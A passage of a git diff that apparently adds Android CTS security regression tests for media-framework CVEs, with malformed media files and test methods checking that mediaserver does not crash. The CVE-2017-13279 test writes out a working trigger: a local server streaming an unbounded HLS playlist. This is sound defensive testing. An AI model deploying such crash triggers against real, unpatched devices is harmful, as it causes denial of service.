+ while (timer_active(test_started)) {
+ poc();
+ sleep(1);
+ }
+ return 0;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/pac/Android.mk b/hostsidetests/securitybulletin/securityPatch/pac/Android.mk
index e7990f5..d5571be 100644
--- a/hostsidetests/securitybulletin/securityPatch/pac/Android.mk
+++ b/hostsidetests/securitybulletin/securityPatch/pac/Android.mk
@@ -28,7 +28,7 @@
libpac \
libutils \
-LOCAL_COMPATIBILITY_SUITE := cts sts
+LOCAL_COMPATIBILITY_SUITE := cts sts vts
LOCAL_CTS_TEST_PACKAGE := android.security.cts
LOCAL_ARM_MODE := arm
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_09.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_09.java
new file mode 100644
index 0000000..25bc89e
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_09.java
@@ -0,0 +1,15 @@
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+
+@SecurityTest
+public class Poc18_09 extends SecurityTestCase {
+
+ /**
+ * CVE-2018-11261
+ */
+ @SecurityTest(minPatchLevel = "2018-09")
+ public void testPocCVE_2018_11261() throws Exception {
+ AdbUtils.runPocAssertNoCrashes("CVE-2018-11261", getDevice(), "mediaserver");
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java b/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java
index ecc086c..761ea30 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java
@@ -33,6 +33,11 @@
* before any existing test methods
****************************************************************/
+ @SecurityTest(minPatchLevel = "2017-07")
+ public void testPocCVE_2017_0684() throws Exception {
+ String processPatterns[] = {"media.codec", "media.swcodec"};
+ runMediaTest("CVE-2017-0684", null, null, getDevice(), processPatterns);
+ }
/****************************************************************
* To prevent merge conflicts, add tests for O below this comment,
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/TestMediaCodec.java b/hostsidetests/securitybulletin/src/android/security/cts/TestMediaCodec.java
index b7ef970..257b137 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/TestMediaCodec.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/TestMediaCodec.java
@@ -71,13 +71,41 @@
To prevent merge conflicts, add HEVC decoder tests for O
below this comment, before any existing test methods
***********************************************************/
+ @SecurityTest(minPatchLevel = "2018-01")
+ public void testPocCVE_2017_13190() throws Exception {
+ runDecodeTest("CVE-2017-13190", null, null, getDevice(), null);
+ }
+ @SecurityTest(minPatchLevel = "2017-05")
+ public void testPocCVE_2017_0589() throws Exception {
+ String inputFiles[] = {"cve_2017_0589.hevc"};
+ runHevcDecodeMemTest(inputFiles,
+ "--input " + TMP_FILE_PATH + inputFiles[0] + " --save_output 0"
+ + " --num_frames -1", getDevice(), null);
+ }
+
+ @SecurityTest(minPatchLevel = "2018-01")
+ public void testPocCVE_2017_13193() throws Exception {
+ String inputFiles[] = {"cve_2017_13193.hevc"};
+ runHevcDecodeTest(inputFiles, "--input " + TMP_FILE_PATH
+ + "cve_2017_13193.hevc --num_frames -1", getDevice(), null);
+ }
+
/***********************************************************
To prevent merge conflicts, add AVC decoder tests for N
below this comment, before any existing test methods
***********************************************************/
+ @SecurityTest(minPatchLevel = "2017-03")
+ public void testPocBug_33139050() throws Exception {
+ String inputFiles[] = {"bug_33139050.h264"};
+ runAvcDecodeMemTest(inputFiles,
+ "--input " + TMP_FILE_PATH
+ + "bug_33139050.h264 --output /dev/null --num_cores 2",
+ getDevice(), null);
+ }
+
@SecurityTest
public void testPocBug_33621215() throws Exception {
String inputFiles[] = {"bug_33621215.h264"};
diff --git a/tests/tests/security/res/raw/cve_2017_0637.mp4 b/tests/tests/security/res/raw/cve_2017_0637.mp4
new file mode 100644
index 0000000..5765dbb
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2017_0637.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2017_13204_avc.mp4 b/tests/tests/security/res/raw/cve_2017_13204_avc.mp4
new file mode 100644
index 0000000..a627ec6
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2017_13204_avc.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2017_13204_framelen.mp4 b/tests/tests/security/res/raw/cve_2017_13204_framelen.mp4
new file mode 100644
index 0000000..5fc9458
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2017_13204_framelen.mp4
@@ -0,0 +1,98 @@
+22
+130
+83
+102
+85
+97
+73
+86
+79
+80
+69
+80
+78
+82
+81
+77
+65
+85
+83
+91
+72
+88
+74
+87
+72
+66
+66
+77
+74
+94
+66
+59
+59
+70
+64
+76
+59
+88
+59
+83
+75
+72
+72
+92
+83
+77
+52
+66
+57
+57
+58
+91
+69
+86
+67
+63
+68
+89
+73
+72
+69
+58
+65
+79
+82
+0
+239
+189
+168
+151
+137
+142
+156
+127
+149
+157
+152
+151
+113
+133
+158
+104
+114
+138
+144
+147
+126
+157
+132
+107
+100
+165
+154
+112
+164
+131
+111
+143
\ No newline at end of file
diff --git a/tests/tests/security/res/raw/cve_2017_13233_hevc.mp4 b/tests/tests/security/res/raw/cve_2017_13233_hevc.mp4
new file mode 100644
index 0000000..8b4858b
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2017_13233_hevc.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2019_2106_hevc.mp4 b/tests/tests/security/res/raw/cve_2019_2106_hevc.mp4
new file mode 100644
index 0000000..e8899bd
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2019_2106_hevc.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2019_2259.mp3 b/tests/tests/security/res/raw/cve_2019_2259.mp3
new file mode 100644
index 0000000..7804a75
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2019_2259.mp3
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2019_2322.mkv b/tests/tests/security/res/raw/cve_2019_2322.mkv
new file mode 100644
index 0000000..8431f98
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2019_2322.mkv
Binary files differ
diff --git a/tests/tests/security/src/android/security/cts/StagefrightTest.java b/tests/tests/security/src/android/security/cts/StagefrightTest.java
index 884c57c..bba1af5 100644
--- a/tests/tests/security/src/android/security/cts/StagefrightTest.java
+++ b/tests/tests/security/src/android/security/cts/StagefrightTest.java
@@ -960,6 +960,86 @@
}
@SecurityTest(minPatchLevel = "2018-04")
+ public void testStagefright_cve_2017_13279() throws Exception {
+ Thread server = new Thread() {
+ @Override
+ public void run(){
+ try (ServerSocket serverSocket = new ServerSocket(8080);
+ Socket conn = serverSocket.accept()){
+ OutputStream stream = conn.getOutputStream();
+ byte http[] = ("HTTP/1.0 200 OK\r\nContent-Type: application/x-mpegURL\r\n\r\n"
+ + "#EXTM3U\n#EXT-X-STREAM-INF:\n").getBytes();
+ stream.write(http);
+ while(!conn.isClosed())
+ stream.write(("a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
+ + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
+ + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
+ + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
+ + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
+ + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
+ + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
+ + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
+ + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
+ + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
+ + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
+ + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
+ + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
+ + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
+ + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
+ + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
+ + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
+ + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
+ + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
+ + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
+ + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
+ + "a\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\na\n"
+ + "a\na\na\na\na\na\na\na\n").getBytes());
+ }
+ catch(IOException e){
+ }
+ }
+ };
+ server.start();
+ String uri = "http://127.0.0.1:8080/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
+ + "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/"
+ + "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.m3u8";
+ final MediaPlayerCrashListener mpcl = new MediaPlayerCrashListener();
+
+ LooperThread t = new LooperThread(new Runnable() {
+ @Override
+ public void run() {
+
+ MediaPlayer mp = new MediaPlayer();
+ mp.setOnErrorListener(mpcl);
+ mp.setOnPreparedListener(mpcl);
+ mp.setOnCompletionListener(mpcl);
+ Surface surface = getDummySurface();
+ mp.setSurface(surface);
+ AssetFileDescriptor fd = null;
+ try {
+ mp.setDataSource(uri);
+ mp.prepareAsync();
+ } catch (IOException e) {
+ Log.e(TAG, e.toString());
+ } finally {
+ closeQuietly(fd);
+ }
+
+ Looper.loop();
+ mp.release();
+ }
+ });
+ t.start();
+ Thread.sleep(60000); // Poc takes a while to crash mediaserver, waitForError
+ // doesn't wait long enough
+ assertFalse("Device *IS* vulnerable to CVE-2017-13279",
+ mpcl.waitForError() == MediaPlayer.MEDIA_ERROR_SERVER_DIED);
+ t.stopLooper();
+ t.join(); // wait for thread to exit so we're sure the player was released
+ server.join();
+ }
+
+ @SecurityTest(minPatchLevel = "2018-04")
public void testStagefright_cve_2017_13276() throws Exception {
doStagefrightTest(R.raw.cve_2017_13276);
}
@@ -984,6 +1064,24 @@
before any existing test methods
***********************************************************/
+ @SecurityTest(minPatchLevel = "2018-02")
+ public void testStagefright_cve_2017_13233() throws Exception {
+ doStagefrightTestRawBlob(R.raw.cve_2017_13233_hevc, "video/hevc", 640,
+ 480);
+ }
+
+ @SecurityTest(minPatchLevel = "2019-07")
+ public void testStagefright_cve_2019_2106() throws Exception {
+ int[] frameSizes = {943, 3153};
+ doStagefrightTestRawBlob(R.raw.cve_2019_2106_hevc, "video/hevc", 320,
+ 240, frameSizes);
+ }
+
+ @SecurityTest(minPatchLevel = "2017-06")
+ public void testStagefright_cve_2017_0637() throws Exception {
+ doStagefrightTest(R.raw.cve_2017_0637, 2 * 72000);
+ }
+
@SecurityTest(minPatchLevel = "2018-09")
public void testStagefright_cve_2018_11287() throws Exception {
doStagefrightTest(R.raw.cve_2018_11287, 180000);
@@ -994,6 +1092,22 @@
doStagefrightTest(R.raw.cve_2019_2327);
}
+ @SecurityTest(minPatchLevel = "2019-07")
+ public void testStagefright_cve_2019_2322() throws Exception {
+ doStagefrightTest(R.raw.cve_2019_2322);
+ }
+
+ @SecurityTest(minPatchLevel = "2018-01")
+ public void testStagefright_cve_2017_13204() throws Exception {
+ int[] frameSizes = getFrameSizes(R.raw.cve_2017_13204_framelen);
+ doStagefrightTestRawBlob(R.raw.cve_2017_13204_avc, "video/avc", 16, 16, frameSizes);
+ }
+
+ @SecurityTest(minPatchLevel = "2019-05")
+ public void testStagefright_cve_2019_2259() throws Exception {
+ doStagefrightTest(R.raw.cve_2019_2259);
+ }
+
@SecurityTest(minPatchLevel = "2018-03")
public void testStagefright_cve_2017_17773() throws Exception {
doStagefrightTest(R.raw.cve_2017_17773);